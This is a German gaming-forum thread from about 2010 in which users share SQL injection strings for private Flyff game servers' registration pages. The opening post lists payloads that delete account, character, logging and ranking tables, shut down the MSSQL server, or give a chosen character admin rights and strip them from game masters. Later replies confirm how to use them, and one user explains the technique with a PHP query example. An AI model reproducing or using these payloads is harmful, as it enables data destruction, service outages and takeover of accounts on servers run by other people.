Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!
Löscht die AccountdatenbankCode:';delete account_tbl;-- Löscht die CharacterdatenbankCode:';delete character_01_tbl;-- Löscht die LoggdatenbankCode:';delete logging_01_tbl;-- Löscht die RankingdatenbankCode:';delete ranking_tbl;-- Schließt die MSSQL Verbindung!Code:';shutdown;-- Gibt deinen Charackter Adminrechte!Code:USE [CHARACTER_01_DBF] UPDATE CHARACTER_TBL SET m_chAuthority='Z' WHERE m_szName='ACCOUNTID' and serverindex='01' USE [ACCOUNT_DBF] UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z' WHERE account='CHARACTERNAME' and gamecode='A000'
Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!
Wie das funktioniert?
Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!
Ich werde diesen Thread updaten,sobald neue Codes bekannt sind!
Viel Spaß
wünscht Frucht
Geändert von Frucht (03.01.10 um 19:23 Uhr) Grund: [Guide]Auflistung der SQL Befehle!
Hat dir mein beitrag gefallen? Dann bitte ich vielmals um ein Thanks!
XD
Nice.^^
Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
Auf welchen workt es denn? :D
Hast ein THX ^-^
LG & Guten Rutsch
MeMyselfAndI
I'm back! :D
Auf denen die in ihren Inputs Sonderzeichen erlauben.
Frucht (02.01.10)
Hatte kleine Fehler in den Code´s.
Jetzt sind die Code´s zu 100% richtig! (99,99%) xD
XD
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'
AccounID: Da gibst du deine ID ein , womit du dich ins Spiel einlogst.
Charaktername: Der Name vom Charakter der die Rechte erhalten soll
Dann hat dein Flyff Charakter die Adminrechte
Foldercarp (03.01.10), Frucht (03.01.10)
Nein,man gibt das einfach in das Regristrierungsscript ein.
Dann wird das ausgeführt.
Und dein Charackter hat entweder Ingamer Rechte.
Oder Datenbanken werden gelöscht.
Oder die Verbindung zwischen Mssql bricht ab...
XD
Ya würde es.
Man kann es aber ganz leicht fixxen,indem man im Regiscript keine Sonderzeichen erlaubt.
XD
ErlyGuard überwacht Packets auf bestimmten Ports aber nicht die Verbindung zwischen SQL und HTTP o.ô
Foldercarp (03.01.10)
Vielen dank tolle Leistung![]()
Man man Man, da hier einige das Prinzip von SQL Injections nicht verstehen.
Hier mal ein Beispiel eines auszuführenden SQL Statements:
$_POST['username'] ist das was wir in das Textfeld eingegeben und abgeschickt haben.SELECT * FROM `accounts` WHERE `username` = '".$_POST['username']."'
Schreiben wir also 'Felix' in das Textfeld so heißt unser SQL Statement
Aber da wir ganz böse Buben sind (und solche coolen "Hacker" wie akira Udo einer ist)SELECT * FROM `accounts` WHERE `username` = 'Felix'
schreiben wir natürlich nicht unseren Accountnamen
rein sondern versuchen schön den Server putt zu machen. Also wie geht das? Ganz einfach
der Coder im ersten Beispiel (das bin ich :D) hat natürlich keine Ahnung von der Materie
und denkt sich "WTF?!! TAGS MASKIEREN? WASN DAT?" Also schreiben wir in
unser Textfeld einfach "ich bin ein böser hacker' DELETE `accounts`--;"
Nun heißt unser SQL Statement so:
Was passiert nun? Anstatt das das Script locker fluffig die Daten des ausgewähltenSELECT * FROM `accounts` WHERE `username` = 'ich bin ein böser hacker' DELETE `accounts`--;'
accounts liest löscht es das account table. Und nein die beiden Minuszeichen (--) sind
kein "voll str3ng geheimer h4cking c0de" sondern sind ein Kommentar in SQL und
bewirken was alles was nach unserem DELETE Statement steht igoniert wird.
Geändert von felix (03.01.10 um 01:27 Uhr)
Lest euch das durch und schau euch die Struktur der Offi DB an, dann wisst ihr bescheid : [Um Links zu sehen registriere dich bitte. Klicke hier.]
Hatte da auch mal eine Tutorial in Englisch, welches besser erklärt war, finde das aber gerade nicht.
Soweit ich weiß hat DD in frühen Zeiten tatsächlich offi FlyFF durch ne Injection drangekriegt... ;)
(Kann mich aber auch irren... die Gerüchteküche ist nicht zu unterschätzen.)
FlyFF Hack development sowie Portal 2 (auch im Coop) und vieles mehr auf meinem Kanal:
www.Tom94.net
Nice. Hast nen thanks.
Aber wieso funksen die nicht bei Fame?
Lesezeichen